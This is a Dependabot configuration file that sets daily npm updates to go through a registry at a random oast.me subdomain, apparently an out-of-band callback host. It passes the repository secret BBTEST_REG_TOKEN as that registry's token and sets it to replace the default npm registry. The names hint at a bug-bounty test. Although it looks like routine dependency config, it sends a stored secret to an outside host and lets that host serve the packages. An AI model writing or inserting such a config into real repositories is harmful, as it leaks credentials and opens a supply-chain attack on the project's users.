version: 2
registries:
  bb-oast-solo:
    type: npm-registry
    url: https://da7od3e358616t5p6ck0asttg1ttkt4q3.oast.me/arm-solo
    token: ${{secrets.BBTEST_REG_TOKEN}}
    replaces-base: true
updates:
  - package-ecosystem: "npm"
    directory: "/"
    schedule:
      interval: "daily"
    registries:
      - bb-oast-solo
